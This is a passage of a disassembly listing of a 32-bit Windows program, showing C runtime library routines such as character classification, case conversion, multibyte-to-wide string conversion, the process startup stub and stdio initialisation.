mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421940 proc near ; CODE XREF: sub_429E90+105�p
; sub_42B350+24�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_453DF0, 1
jle short loc_421960
push 8
mov eax, [ebp+arg_0]
push eax
call sub_427040
add esp, 8
mov [ebp+var_4], eax
jmp short loc_421975
; ---------------------------------------------------------------------------
loc_421960: ; CODE XREF: sub_421940+B�j
mov ecx, [ebp+arg_0]
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 8
mov [ebp+var_4], eax
loc_421975: ; CODE XREF: sub_421940+1E�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_421940 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp ds:dword_453DF0, 1
jle short loc_4219A0
push 10h
mov eax, [ebp+8]
push eax
call sub_427040
add esp, 8
mov [ebp-4], eax
jmp short loc_4219B5
; ---------------------------------------------------------------------------
loc_4219A0: ; CODE XREF: _0:0042198B�j
mov ecx, [ebp+8]
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 10h
mov [ebp-4], eax
loc_4219B5: ; CODE XREF: _0:0042199E�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp ds:dword_453DF0, 1
jle short loc_4219E3
push 107h
mov eax, [ebp+8]
push eax
call sub_427040
add esp, 8
mov [ebp-4], eax
jmp short loc_4219FA
; ---------------------------------------------------------------------------
loc_4219E3: ; CODE XREF: _0:004219CB�j
mov ecx, [ebp+8]
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 107h
mov [ebp-4], eax
loc_4219FA: ; CODE XREF: _0:004219E1�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp ds:dword_453DF0, 1
jle short loc_421A33
push 157h
mov eax, [ebp+8]
push eax
call sub_427040
add esp, 8
mov [ebp-4], eax
jmp short loc_421A4A
; ---------------------------------------------------------------------------
loc_421A33: ; CODE XREF: _0:00421A1B�j
mov ecx, [ebp+8]
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 157h
mov [ebp-4], eax
loc_421A4A: ; CODE XREF: _0:00421A31�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp ds:dword_453DF0, 1
jle short loc_421A83
push 117h
mov eax, [ebp+8]
push eax
call sub_427040
add esp, 8
mov [ebp-4], eax
jmp short loc_421A9A
; ---------------------------------------------------------------------------
loc_421A83: ; CODE XREF: _0:00421A6B�j
mov ecx, [ebp+8]
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 117h
mov [ebp-4], eax
loc_421A9A: ; CODE XREF: _0:00421A81�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp ds:dword_453DF0, 1
jle short loc_421AD0
push 20h
mov eax, [ebp+8]
push eax
call sub_427040
add esp, 8
mov [ebp-4], eax
jmp short loc_421AE5
; ---------------------------------------------------------------------------
loc_421AD0: ; CODE XREF: _0:00421ABB�j
mov ecx, [ebp+8]
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 20h
mov [ebp-4], eax
loc_421AE5: ; CODE XREF: _0:00421ACE�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
cmp dword ptr [ebp+8], 80h
sbb eax, eax
neg eax
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, [ebp+8]
and eax, 7Fh
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 8
cmp ds:dword_453DF0, 1
jle short loc_421B35
push 103h
mov eax, [ebp+8]
push eax
call sub_427040
add esp, 8
mov [ebp-4], eax
jmp short loc_421B4C
; ---------------------------------------------------------------------------
loc_421B35: ; CODE XREF: _0:00421B1D�j
mov ecx, [ebp+8]
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 103h
mov [ebp-4], eax
loc_421B4C: ; CODE XREF: _0:00421B33�j
cmp dword ptr [ebp-4], 0
jnz short loc_421B61
cmp dword ptr [ebp+8], 5Fh
jz short loc_421B61
mov dword ptr [ebp-8], 0
jmp short loc_421B68
; ---------------------------------------------------------------------------
loc_421B61: ; CODE XREF: _0:00421B50�j _0:00421B56�j
mov dword ptr [ebp-8], 1
loc_421B68: ; CODE XREF: _0:00421B5F�j
mov eax, [ebp-8]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 8
cmp ds:dword_453DF0, 1
jle short loc_421B95
push 107h
mov eax, [ebp+8]
push eax
call sub_427040
add esp, 8
mov [ebp-4], eax
jmp short loc_421BAC
; ---------------------------------------------------------------------------
loc_421B95: ; CODE XREF: _0:00421B7D�j
mov ecx, [ebp+8]
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 107h
mov [ebp-4], eax
loc_421BAC: ; CODE XREF: _0:00421B93�j
cmp dword ptr [ebp-4], 0
jnz short loc_421BC1
cmp dword ptr [ebp+8], 5Fh
jz short loc_421BC1
mov dword ptr [ebp-8], 0
jmp short loc_421BC8
; ---------------------------------------------------------------------------
loc_421BC1: ; CODE XREF: _0:00421BB0�j _0:00421BB6�j
mov dword ptr [ebp-8], 1
loc_421BC8: ; CODE XREF: _0:00421BBF�j
mov eax, [ebp-8]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_421BD0 proc near ; CODE XREF: sub_418827+1D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
test eax, eax
jz short locret_421C1C
mov edx, [esp+arg_0]
push esi
push edi
mov esi, edx
mov edi, [esp+8+arg_4]
or edx, edi
and edx, 3
jz short loc_421C1D
test eax, 1
jz short loc_421BFD
mov cl, [esi]
cmp cl, [edi]
jnz short loc_421C4A
inc esi
inc edi
dec eax
jz short loc_421C1A
loc_421BFD: ; CODE XREF: sub_421BD0+20�j
; sub_421BD0+48�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_421C4A
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_421C4A
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_421BFD
loc_421C1A: ; CODE XREF: sub_421BD0+2B�j
; sub_421BD0+84�j
pop edi
pop esi
locret_421C1C: ; CODE XREF: sub_421BD0+6�j
retn
; ---------------------------------------------------------------------------
loc_421C1D: ; CODE XREF: sub_421BD0+19�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_421C52
repe cmpsd
jz short loc_421C52
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_421C45
cmp ch, dh
jnz short loc_421C45
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_421C45
cmp ch, dh
loc_421C45: ; CODE XREF: sub_421BD0+63�j
; sub_421BD0+67�j ...
mov eax, 0
loc_421C4A: ; CODE XREF: sub_421BD0+26�j
; sub_421BD0+33�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_421C52: ; CODE XREF: sub_421BD0+55�j
; sub_421BD0+59�j
test eax, eax
jz short loc_421C1A
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_421C45
dec eax
jz short loc_421C79
cmp dh, ch
jnz short loc_421C45
dec eax
jz short loc_421C79
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_421C45
dec eax
loc_421C79: ; CODE XREF: sub_421BD0+8F�j
; sub_421BD0+96�j
pop edi
pop esi
retn
sub_421BD0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, [ebp+8]
add eax, 20h
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421C90 proc near ; CODE XREF: sub_418B3E+6�p
; sub_418B5C+48�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4F33F8, 0
jnz short loc_421CB7
cmp [ebp+arg_0], 41h
jl short loc_421CB2
cmp [ebp+arg_0], 5Ah
jg short loc_421CB2
mov eax, [ebp+arg_0]
add eax, 20h
mov [ebp+arg_0], eax
loc_421CB2: ; CODE XREF: sub_421C90+11�j
; sub_421C90+17�j
mov eax, [ebp+arg_0]
jmp short loc_421D1F
; ---------------------------------------------------------------------------
loc_421CB7: ; CODE XREF: sub_421C90+B�j
push offset dword_4F37C8
call ds:dword_4F5488 ; InterlockedIncrement
cmp ds:dword_4F37C4, 0
jz short loc_421CE9
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
push 13h
call sub_423280
add esp, 4
mov [ebp+var_4], 1
jmp short loc_421CF0
; ---------------------------------------------------------------------------
loc_421CE9: ; CODE XREF: sub_421C90+39�j
mov [ebp+var_4], 0
loc_421CF0: ; CODE XREF: sub_421C90+57�j
mov ecx, [ebp+arg_0]
push ecx
call sub_421D30
add esp, 4
mov [ebp+arg_0], eax
cmp [ebp+var_4], 0
jz short loc_421D11
push 13h
call sub_423320
add esp, 4
jmp short loc_421D1C
; ---------------------------------------------------------------------------
loc_421D11: ; CODE XREF: sub_421C90+73�j
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
loc_421D1C: ; CODE XREF: sub_421C90+7F�j
mov eax, [ebp+arg_0]
loc_421D1F: ; CODE XREF: sub_421C90+25�j
mov esp, ebp
pop ebp
retn
sub_421C90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421D30 proc near ; CODE XREF: sub_420F10+94�p
; sub_420F10+9E�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
cmp ds:dword_4F33F8, 0
jnz short loc_421D5C
cmp [ebp+arg_0], 41h
jl short loc_421D54
cmp [ebp+arg_0], 5Ah
jg short loc_421D54
mov eax, [ebp+arg_0]
add eax, 20h
mov [ebp+arg_0], eax
loc_421D54: ; CODE XREF: sub_421D30+13�j
; sub_421D30+19�j
mov eax, [ebp+arg_0]
jmp loc_421E57
; ---------------------------------------------------------------------------
loc_421D5C: ; CODE XREF: sub_421D30+D�j
cmp [ebp+arg_0], 100h
jge short loc_421DA3
cmp ds:dword_453DF0, 1
jle short loc_421D81
push 1
mov ecx, [ebp+arg_0]
push ecx
call sub_427040
add esp, 8
mov [ebp+var_10], eax
jmp short loc_421D95
; ---------------------------------------------------------------------------
loc_421D81: ; CODE XREF: sub_421D30+3C�j
mov edx, [ebp+arg_0]
mov eax, ds:off_453BE4
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 1
mov [ebp+var_10], ecx
loc_421D95: ; CODE XREF: sub_421D30+4F�j
cmp [ebp+var_10], 0
jnz short loc_421DA3
mov eax, [ebp+arg_0]
jmp loc_421E57
; ---------------------------------------------------------------------------
loc_421DA3: ; CODE XREF: sub_421D30+33�j
; sub_421D30+69�j
mov edx, [ebp+arg_0]
sar edx, 8
and edx, 0FFh
and edx, 0FFh
mov eax, ds:off_453BE4
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 8000h
test ecx, ecx
jz short loc_421DEC
mov edx, [ebp+arg_0]
sar edx, 8
and edx, 0FFh
mov [ebp+var_8], dl
mov al, byte ptr [ebp+arg_0]
mov [ebp+var_7], al
mov [ebp+var_6], 0
mov [ebp+var_4], 2
jmp short loc_421DFD
; ---------------------------------------------------------------------------
loc_421DEC: ; CODE XREF: sub_421D30+98�j
mov cl, byte ptr [ebp+arg_0]
mov [ebp+var_8], cl
mov [ebp+var_7], 0
mov [ebp+var_4], 1
loc_421DFD: ; CODE XREF: sub_421D30+BA�j
push 1
push 0
push 3
lea edx, [ebp+var_C]
push edx
mov eax, [ebp+var_4]
push eax
lea ecx, [ebp+var_8]
push ecx
push 100h
mov edx, ds:dword_4F33F8
push edx
call sub_42EC50
add esp, 20h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_421E31
mov eax, [ebp+arg_0]
jmp short loc_421E57
; ---------------------------------------------------------------------------
loc_421E31: ; CODE XREF: sub_421D30+FA�j
cmp [ebp+var_4], 1
jnz short loc_421E41
mov eax, [ebp+var_C]
and eax, 0FFh
jmp short loc_421E57
; ---------------------------------------------------------------------------
loc_421E41: ; CODE XREF: sub_421D30+105�j
mov eax, [ebp+var_C]
and eax, 0FFh
mov ecx, [ebp+var_C+1]
and ecx, 0FFh
shl ecx, 8
or eax, ecx
loc_421E57: ; CODE XREF: sub_421D30+27�j
; sub_421D30+6E�j ...
mov esp, ebp
pop ebp
retn
sub_421D30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421E60 proc near ; CODE XREF: sub_419229+9C�p
; sub_41A20B+55�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_421E6A: ; CODE XREF: sub_421E60+1F�j
mov ecx, [ebp+var_4]
xor edx, edx
mov dx, [ecx]
mov eax, [ebp+var_4]
add eax, 2
mov [ebp+var_4], eax
test edx, edx
jz short loc_421E81
jmp short loc_421E6A
; ---------------------------------------------------------------------------
loc_421E81: ; CODE XREF: sub_421E60+1D�j
mov eax, [ebp+var_4]
sub eax, [ebp+arg_0]
sar eax, 1
sub eax, 1
mov esp, ebp
pop ebp
retn
sub_421E60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421E90 proc near ; CODE XREF: sub_419229+6E�p
; sub_419229+7F�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push offset dword_4F37C8
call ds:dword_4F5488 ; InterlockedIncrement
cmp ds:dword_4F37C4, 0
jz short loc_421EC8
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
push 13h
call sub_423280
add esp, 4
mov [ebp+var_4], 1
jmp short loc_421ECF
; ---------------------------------------------------------------------------
loc_421EC8: ; CODE XREF: sub_421E90+18�j
mov [ebp+var_4], 0
loc_421ECF: ; CODE XREF: sub_421E90+36�j
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_421F10
add esp, 0Ch
mov [ebp+var_8], eax
cmp [ebp+var_4], 0
jz short loc_421EF8
push 13h
call sub_423320
add esp, 4
jmp short loc_421F03
; ---------------------------------------------------------------------------
loc_421EF8: ; CODE XREF: sub_421E90+5A�j
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
loc_421F03: ; CODE XREF: sub_421E90+66�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_421E90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421F10 proc near ; CODE XREF: sub_421E90+4B�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_4], 0
cmp [ebp+arg_0], 0
jz short loc_421F33
cmp [ebp+arg_8], 0
jnz short loc_421F33
xor eax, eax
jmp loc_4220F4
; ---------------------------------------------------------------------------
loc_421F33: ; CODE XREF: sub_421F10+14�j
; sub_421F10+1A�j ...
cmp [ebp+arg_4], 0
jnz short loc_421F57
push offset dword_43CDD8
push 0
push 55h
push offset dword_43CDCC
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_421F57
int 3 ; Trap to Debugger
loc_421F57: ; CODE XREF: sub_421F10+27�j
; sub_421F10+44�j
xor eax, eax
test eax, eax
jnz short loc_421F33
cmp [ebp+arg_0], 0
jz loc_4220A6
cmp ds:dword_4F33F8, 0
jnz short loc_421FB9
loc_421F70: ; CODE XREF: sub_421F10+9F�j
mov ecx, [ebp+var_4]
cmp ecx, [ebp+arg_8]
jnb short loc_421FB1
mov edx, [ebp+arg_4]
add edx, [ebp+var_4]
movzx ax, byte ptr [edx]
mov ecx, [ebp+arg_0]
mov [ecx], ax
mov edx, [ebp+arg_4]
add edx, [ebp+var_4]
movsx eax, byte ptr [edx]
test eax, eax
jnz short loc_421F9D
mov eax, [ebp+var_4]
jmp loc_4220F4
; ---------------------------------------------------------------------------
loc_421F9D: ; CODE XREF: sub_421F10+83�j
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+arg_0]
add edx, 2
mov [ebp+arg_0], edx
jmp short loc_421F70
; ---------------------------------------------------------------------------
loc_421FB1: ; CODE XREF: sub_421F10+66�j
mov eax, [ebp+var_4]
jmp loc_4220F4
; ---------------------------------------------------------------------------
loc_421FB9: ; CODE XREF: sub_421F10+5E�j
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_0]
push ecx
push 0FFFFFFFFh
mov edx, [ebp+arg_4]
push edx
push 9
mov eax, ds:dword_4F3408
push eax
call ds:dword_4F5454 ; MultiByteToWideChar
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_421FE9
mov eax, [ebp+var_4]
sub eax, 1
jmp loc_4220F4
; ---------------------------------------------------------------------------
loc_421FE9: ; CODE XREF: sub_421F10+CC�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_422007
call sub_429A90
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp loc_4220F4
; ---------------------------------------------------------------------------
loc_422007: ; CODE XREF: sub_421F10+E2�j
mov ecx, [ebp+arg_8]
mov [ebp+var_10], ecx
mov edx, [ebp+arg_4]
mov [ebp+var_8], edx
jmp short loc_42201E
; ---------------------------------------------------------------------------
loc_422015: ; CODE XREF: sub_421F10:loc_42205F�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_42201E: ; CODE XREF: sub_421F10+103�j
mov ecx, [ebp+var_10]
mov edx, [ebp+var_10]
sub edx, 1
mov [ebp+var_10], edx
test ecx, ecx
jz short loc_422061
mov eax, [ebp+var_8]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_422061
mov edx, [ebp+var_8]
xor eax, eax
mov al, [edx]
mov ecx, ds:off_453BE4
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8000h
test edx, edx
jz short loc_42205F
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_42205F: ; CODE XREF: sub_421F10+144�j
jmp short loc_422015
; ---------------------------------------------------------------------------
loc_422061: ; CODE XREF: sub_421F10+11C�j
; sub_421F10+127�j
mov ecx, [ebp+var_8]
sub ecx, [ebp+arg_4]
mov [ebp+var_C], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_C]
push ecx
mov edx, [ebp+arg_4]
push edx
push 1
mov eax, ds:dword_4F3408
push eax
call ds:dword_4F5454 ; MultiByteToWideChar
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4220A1
call sub_429A90
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_4220F4
; ---------------------------------------------------------------------------
loc_4220A1: ; CODE XREF: sub_421F10+17F�j
mov eax, [ebp+var_4]
jmp short loc_4220F4
; ---------------------------------------------------------------------------
loc_4220A6: ; CODE XREF: sub_421F10+51�j
cmp ds:dword_4F33F8, 0
jnz short loc_4220BD
mov ecx, [ebp+arg_4]
push ecx
call sub_41BC70
add esp, 4
jmp short loc_4220F4
; ---------------------------------------------------------------------------
loc_4220BD: ; CODE XREF: sub_421F10+19D�j
push 0
push 0
push 0FFFFFFFFh
mov edx, [ebp+arg_4]
push edx
push 9
mov eax, ds:dword_4F3408
push eax
call ds:dword_4F5454 ; MultiByteToWideChar
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4220EE
call sub_429A90
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_4220F4
; ---------------------------------------------------------------------------
loc_4220EE: ; CODE XREF: sub_421F10+1CC�j
mov eax, [ebp+var_4]
sub eax, 1
loc_4220F4: ; CODE XREF: sub_421F10+1E�j
; sub_421F10+88�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_421F10 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43CDE8
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFA4h
push ebx
push esi
push edi
mov [ebp-18h], esp
call ds:dword_4F5494 ; GetVersion
mov ds:dword_4F32F8, eax
mov eax, ds:dword_4F32F8
shr eax, 8
and eax, 0FFh
mov ds:dword_4F3304, eax
mov ecx, ds:dword_4F32F8
and ecx, 0FFh
mov ds:dword_4F3300, ecx
mov edx, ds:dword_4F3300
shl edx, 8
add edx, ds:dword_4F3304
mov ds:dword_4F32FC, edx
mov eax, ds:dword_4F32F8
shr eax, 10h
and eax, 0FFFFh
mov ds:dword_4F32F8, eax
push 1
call sub_426EC0
add esp, 4
test eax, eax
jnz short loc_422194
push 1Ch
call sub_4222A0
add esp, 4
loc_422194: ; CODE XREF: _0:00422188�j
call sub_428E00
test eax, eax
jnz short loc_4221A7
push 10h
call sub_4222A0
add esp, 4
loc_4221A7: ; CODE XREF: _0:0042219B�j
mov dword ptr [ebp-4], 0
call sub_42FB10
call ds:dword_4F5490 ; GetCommandLineA
mov ds:dword_4F4A24, eax
call sub_42F8F0
mov ds:dword_4F3360, eax
call sub_42F3E0
call sub_42F290
call sub_41E860
mov dword ptr [ebp-30h], 0
lea ecx, [ebp-5Ch]
push ecx
call ds:dword_4F548C ; GetStartupInfoA
call sub_42F1D0
mov [ebp-64h], eax
mov edx, [ebp-30h]
and edx, 1
test edx, edx
jz short loc_422207
mov eax, [ebp-2Ch]
and eax, 0FFFFh
mov [ebp-6Ch], eax
jmp short loc_42220E
; ---------------------------------------------------------------------------
loc_422207: ; CODE XREF: _0:004221F8�j
mov dword ptr [ebp-6Ch], 0Ah
loc_42220E: ; CODE XREF: _0:00422205�j
mov ecx, [ebp-6Ch]
push ecx
mov edx, [ebp-64h]
push edx
push 0
push 0
call ds:off_4F5370
push eax
call sub_401404
mov [ebp-60h], eax
mov eax, [ebp-60h]
push eax
call sub_41E8A0
mov ecx, [ebp-14h]
mov edx, [ecx]
mov eax, [edx]
mov [ebp-68h], eax
mov ecx, [ebp-14h]
push ecx
mov edx, [ebp-68h]
push edx
call sub_42EFB0
add esp, 8
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov eax, [ebp-68h]
push eax
call sub_41E8C0
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422270 proc near ; CODE XREF: sub_420D30+2C�p
; sub_4222D0+8D�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp ds:dword_4F3368, 1
jnz short loc_422281
call sub_42FEE0
loc_422281: ; CODE XREF: sub_422270+A�j
mov eax, [ebp+arg_0]
push eax
call sub_42FF30
add esp, 4
push 0FFh
call ds:off_451840
add esp, 4
pop ebp
retn
sub_422270 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4222A0 proc near ; CODE XREF: _0:0042218C�p _0:0042219F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp ds:dword_4F3368, 1
jnz short loc_4222B1
call sub_42FEE0
loc_4222B1: ; CODE XREF: sub_4222A0+A�j
mov eax, [ebp+arg_0]
push eax
call sub_42FF30
add esp, 4
push 0FFh
call ds:off_4F5338
pop ebp
retn
sub_4222A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4222D0 proc near ; DATA XREF: _2:0043F024�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4F4A20, 0
jnz short loc_4222E9
mov ds:dword_4F4A20, 200h
jmp short loc_4222FC
; ---------------------------------------------------------------------------
loc_4222E9: ; CODE XREF: sub_4222D0+B�j
cmp ds:dword_4F4A20, 14h
jge short loc_4222FC
mov ds:dword_4F4A20, 14h
loc_4222FC: ; CODE XREF: sub_4222D0+17�j
; sub_4222D0+20�j
push 83h
push offset dword_43CDF4
push 2
push 4
mov eax, ds:dword_4F4A20
push eax
call sub_41C2D0
add esp, 14h
mov ds:dword_4F3A14, eax
cmp ds:dword_4F3A14, 0
jnz short loc_422365
mov ds:dword_4F4A20, 14h
push 86h
push offset dword_43CDF4
push 2
push 4
mov ecx, ds:dword_4F4A20
push ecx
call sub_41C2D0
add esp, 14h
mov ds:dword_4F3A14, eax
cmp ds:dword_4F3A14, 0
jnz short loc_422365
push 1Ah
call sub_422270
add esp, 4
loc_422365: ; CODE XREF: sub_4222D0+54�j
; sub_4222D0+89�j
mov [ebp+var_4], 0
jmp short loc_422377
; ---------------------------------------------------------------------------
loc_42236E: ; CODE XREF: sub_4222D0+C4�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_422377: ; CODE XREF: sub_4222D0+9C�j
cmp [ebp+var_4], 14h
jge short loc_422396
mov eax, [ebp+var_4]
shl eax, 5
add eax, offset off_451848
mov ecx, [ebp+var_4]
mov edx, ds:dword_4F3A14
mov [edx+ecx*4], eax
jmp short loc_42236E
; ---------------------------------------------------------------------------
loc_422396: ; CODE XREF: sub_4222D0+AB�j
mov [ebp+var_4], 0
jmp short loc_4223A8
; ---------------------------------------------------------------------------
loc_42239F: ; CODE XREF: sub_4222D0:loc_4223F6�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_4223A8: ; CODE XREF: sub_4222D0+CD�j
cmp [ebp+var_4], 3
jge short loc_4223F8
mov ecx, [ebp+var_4]
sar ecx, 5
mov edx, [ebp+var_4]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
cmp dword ptr [eax+edx], 0FFFFFFFFh
jz short loc_4223E6
mov ecx, [ebp+var_4]
sar ecx, 5
mov edx, [ebp+var_4]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
cmp dword ptr [eax+edx], 0
jnz short loc_4223F6
loc_4223E6: ; CODE XREF: sub_4222D0+F8�j
mov ecx, [ebp+var_4]
shl ecx, 5
mov ds:dword_451858[ecx], 0FFFFFFFFh
loc_4223F6: ; CODE XREF: sub_4222D0+114�j
jmp short loc_42239F
; ---------------------------------------------------------------------------
loc_4223F8: ; CODE XREF: sub_4222D0+DC�j
mov esp, ebp
pop ebp
retn
sub_4222D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422400 proc near ; DATA XREF: _2:0043F038�o
push ebp
mov ebp, esp
call sub_422FE0
movsx eax, ds:byte_4F332C
test eax, eax
jz short loc_422418
call sub_430140
loc_422418: ; CODE XREF: sub_422400+11�j
pop ebp
retn
sub_422400 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422420 proc near ; CODE XREF: sub_41BCF0+55�p
; sub_41E180+8�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], offset off_451848
jb short loc_42244E
cmp [ebp+arg_0], offset dword_451AA8
ja short loc_42244E
mov eax, [ebp+arg_0]
sub eax, offset off_451848
sar eax, 5
add eax, 1Ch
push eax
call sub_423280
add esp, 4
jmp short loc_42245B
; ---------------------------------------------------------------------------
loc_42244E: ; CODE XREF: sub_422420+A�j
; sub_422420+13�j
mov ecx, [ebp+arg_0]
add ecx, 20h
push ecx
call ds:dword_4F53A8 ; RtlEnterCriticalSection
loc_42245B: ; CODE XREF: sub_422420+2C�j
pop ebp
retn
sub_422420 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422460 proc near ; CODE XREF: sub_422FF0+7E�p
; sub_427B60+6F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp [ebp+arg_0], 14h
jge short loc_42247A
mov eax, [ebp+arg_0]
add eax, 1Ch
push eax
call sub_423280
add esp, 4
jmp short loc_422487
; ---------------------------------------------------------------------------
